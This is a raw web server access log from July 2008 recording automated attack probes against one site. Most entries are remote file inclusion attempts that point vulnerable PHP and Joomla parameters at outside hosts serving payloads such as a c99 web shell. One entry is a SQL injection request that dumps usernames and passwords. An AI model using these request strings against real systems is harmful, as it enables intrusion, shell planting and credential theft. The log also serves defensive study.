72.29.87.80 - - [20/Jul/2008:17:53:25 -0700] "GET /logs//components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
72.29.87.80 - - [20/Jul/2008:17:53:27 -0700] "GET /logs/access_070917.log//components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
85.114.135.126 - - [20/Jul/2008:17:53:42 -0700] "GET /logs/access_071008.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.32.96.7 - - [20/Jul/2008:17:54:13 -0700] "GET /!scanhttp://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.29.4.54 - - [20/Jul/2008:17:54:50 -0700] "GET /logs/access_070820.log//classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
78.165.62.148 - - [20/Jul/2008:17:54:53 -0700] "GET /logs/access.log HTTP/1.1" 200 76084 "http://search.yahoo.com/search?p=option%3Dcom_rsgallery&ei=UTF-8&fr=yfp-t-501&xargs=0&pstart=1&b=101" "Opera/9.51 (Windows NT 5.1; U; tr)" "summitcircle.com"
78.165.62.148 - - [20/Jul/2008:17:55:07 -0700] "GET /logs/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,%20password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "Opera/9.51 (Windows NT 5.1; U; tr)" "summitcircle.com"
78.165.62.148 - - [20/Jul/2008:17:55:07 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://summitcircle.com/logs/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,%20password),6,7,8,9,10,11%20from%20mos_users--" "Opera/9.51 (Windows NT 5.1; U; tr)" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:57:05 -0700] "GET /logs/access_080629.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
89.111.173.115 - - [20/Jul/2008:17:58:03 -0700] "GET /index.php?page=&lang=http://www.brazebo.it/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
89.111.173.115 - - [20/Jul/2008:17:58:04 -0700] "GET /logs/index.php?page=&lang=http://www.brazebo.it/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
216.246.78.141 - - [20/Jul/2008:17:58:52 -0700] "GET /logs/access_080114.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.78.141 - - [20/Jul/2008:17:58:52 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.78.141 - - [20/Jul/2008:17:58:53 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
200.29.4.54 - - [20/Jul/2008:17:59:38 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
92.51.130.220 - - [20/Jul/2008:17:59:48 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
92.51.130.220 - - [20/Jul/2008:17:59:49 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:18:00:00 -0700] "GET /logs/access_080317.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:18:00:01 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:18:00:02 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.29.4.54 - - [20/Jul/2008:18:00:27 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.29.4.54 - - [20/Jul/2008:18:00:32 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.39.5.203 - - [20/Jul/2008:18:02:07 -0700] "GET /logs/access_080128.log/?sourcedir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.39.5.203 - - [20/Jul/2008:18:02:08 -0700] "GET /?sourcedir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.39.5.203 - - [20/Jul/2008:18:02:09 -0700] "GET /logs/?sourcedir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 200 10519 "-" "libwww-perl/5.805" "www.summitcircle.com"
92.51.130.220 - - [20/Jul/2008:18:02:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
92.51.130.220 - - [20/Jul/2008:18:02:17 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.39.5.203 - - [20/Jul/2008:18:02:46 -0700] "GET /logs/access_071112.log/?sourcedir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:03:04 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:03:04 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:03:04 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:03:05 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
88.214.192.29 - - [20/Jul/2008:18:03:49 -0700] "GET //index.php?go=http://bolikowski.com/images/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
69.72.153.58 - - [20/Jul/2008:18:03:53 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "summitcircle.com"
69.72.153.58 - - [20/Jul/2008:18:03:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "summitcircle.com"
69.72.153.58 - - [20/Jul/2008:18:03:53 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
69.72.153.58 - - [20/Jul/2008:18:03:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
216.246.78.141 - - [20/Jul/2008:18:04:05 -0700] "GET /logs/access_080204.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.104.34.70 - - [20/Jul/2008:18:04:09 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
216.104.34.70 - - [20/Jul/2008:18:04:09 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
216.104.34.70 - - [20/Jul/2008:18:04:10 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "summitcircle.com"
216.104.34.70 - - [20/Jul/2008:18:04:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "summitcircle.com"
87.10.172.234 - - [20/Jul/2008:18:04:48 -0700] "GET /logs/access_080602.log/index.php?op=http://hackerztool.altervista.org/co.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
87.10.172.234 - - [20/Jul/2008:18:04:49 -0700] "GET /index.php?op=http://hackerztool.altervista.org/co.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
87.10.172.234 - - [20/Jul/2008:18:04:49 -0700] "GET /logs/index.php?op=http://hackerztool.altervista.org/co.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
210.87.251.47 - - [20/Jul/2008:18:04:50 -0700] "GET /logs/access.log/index.php?p=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
210.87.251.41 - - [20/Jul/2008:18:04:51 -0700] "GET /index.php?p=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
210.87.251.43 - - [20/Jul/2008:18:04:51 -0700] "GET /logs/index.php?p=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:04:57 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:04:57 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:04:58 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:04:58 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:05:00 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:05:00 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:05:01 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:18:05:02 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
210.87.251.43 - - [20/Jul/2008:18:05:13 -0700] "GET /logs/access_071008.log/index.php?p=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.25.149.45 - - [20/Jul/2008:18:09:51 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.25.149.45 - - [20/Jul/2008:18:09:51 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathhttp://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.25.149.45 - - [20/Jul/2008:18:09:51 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.25.149.45 - - [20/Jul/2008:18:09:52 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathhttp://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.10.64.239 - - [20/Jul/2008:18:11:05 -0700] "GET /logs/access_080204.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
87.10.64.239 - - [20/Jul/2008:18:11:06 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
87.10.64.239 - - [20/Jul/2008:18:11:06 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:18:11:31 -0700] "GET /logs/access_080317.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:18:11:31 -0700] "GET /logs/access_080317.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:18:11:32 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:18:11:32 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:18:11:32 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:18:11:32 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
211.60.155.3 - - [20/Jul/2008:18:11:33 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
211.60.155.3 - - [20/Jul/2008:18:11:33 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
211.60.155.3 - - [20/Jul/2008:18:11:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "summitcircle.com"
211.60.155.3 - - [20/Jul/2008:18:11:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "summitcircle.com"
201.26.212.89 - - [20/Jul/2008:18:12:32 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
195.39.5.203 - - [20/Jul/2008:18:13:45 -0700] "GET //include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
195.39.5.203 - - [20/Jul/2008:18:13:46 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
87.10.64.239 - - [20/Jul/2008:18:14:02 -0700] "GET /logs/access_071210.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
72.29.87.80 - - [20/Jul/2008:18:14:34 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "summitcircle.com"
72.29.87.80 - - [20/Jul/2008:18:14:34 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "summitcircle.com"
72.29.87.80 - - [20/Jul/2008:18:14:35 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.summitcircle.com"
72.29.87.80 - - [20/Jul/2008:18:14:37 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.summitcircle.com"
195.39.5.203 - - [20/Jul/2008:18:15:10 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
195.39.5.203 - - [20/Jul/2008:18:15:11 -0700] "GET //include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
195.39.5.203 - - [20/Jul/2008:18:15:12 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
189.102.16.28 - - [20/Jul/2008:18:15:31 -0700] "GET /logs/access_080121.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
189.102.16.28 - - [20/Jul/2008:18:15:31 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
189.102.16.28 - - [20/Jul/2008:18:15:31 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
217.110.54.240 - - [20/Jul/2008:18:16:02 -0700] "GET /logs/errors.php?error=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.110.54.240 - - [20/Jul/2008:18:16:02 -0700] "GET /errors.php?error=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.110.54.240 - - [20/Jul/2008:18:16:17 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.110.54.240 - - [20/Jul/2008:18:16:18 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
213.206.113.104 - - [20/Jul/2008:18:16:35 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
189.102.16.28 - - [20/Jul/2008:18:16:54 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
168.209.97.34 - - [20/Jul/2008:18:16:54 -0700] "GET /afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
168.209.97.34 - - [20/Jul/2008:18:16:54 -0700] "GET /logs/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
168.209.97.34 - - [20/Jul/2008:18:16:54 -0700] "GET /logs/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "summitcircle.com"
168.209.97.34 - - [20/Jul/2008:18:16:54 -0700] "GET /afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "summitcircle.com"
89.111.173.115 - - [20/Jul/2008:18:16:59 -0700] "GET /logs/access_080210.log/index.php?page=&lang=http://www.brazebo.it/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.173.115 - - [20/Jul/2008:18:16:59 -0700] "GET /index.php?page=&lang=http://www.brazebo.it/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.173.115 - - [20/Jul/2008:18:17:00 -0700] "GET /logs/index.php?page=&lang=http://www.brazebo.it/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
